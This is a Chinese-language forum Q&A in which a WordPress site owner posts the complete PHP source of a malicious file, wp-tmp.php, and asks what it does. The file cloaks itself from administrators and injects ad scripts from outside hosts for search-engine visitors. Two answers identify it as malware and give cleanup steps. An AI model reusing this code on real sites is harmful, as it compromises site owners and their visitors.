在WordPress上可以做什么病毒wp-tmp.php

时间:2018-10-19 17:55:20

标签: javascript php wordpress

我在我的WordPress上的wp-includes /文件中发现了这种病毒,该文件已被siteguarding.com等扫描,并发现错误的脚本广告

此内容文件“ wp-tmp.php”:

ini_set('display_errors', 0);
error_reporting(0);
$anx='a107e0b262722f0cea3f7ce097597b7c';
if ( ! function_exists( 'slider_option' ) ) {  


function slider_option($content){ 
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 





}

此文件在做什么? 而如何知道该文件已插入我的网站文件根目录中? 我正在与siteguarding.com支持人员聊天,并告诉我“您的网站已被黑客入侵” wp-includes / wp-tmp.php-100%病毒 up / includes / functions.php-100%病毒 您已列入黑名单

2 个答案:

答案 0 :(得分:0)

这是恶意软件,绝对不是WP的一部分。删除文件,编辑文件夹权限,在文件中搜索其他恶意代码。更新WP和您的插件。

答案 1 :(得分:0)

此文件使用您的IO,有时会导致404、500和数据库连接问题。

此文件使用您的主题funtions.php注入代码(恶意软件)。

此文件注入的代码从functions.php的第一行开始,并以诸如//主题tmp之类的注释结束。

解决方案是先从 / wp-includes 中删除 wp-tmp.php wp-vcd.php ,然后删除来自functions.php的代码,并将父主题和子主题的functions.php权限设置为 0555 0444 。这样该恶意软件就无法写入functions.php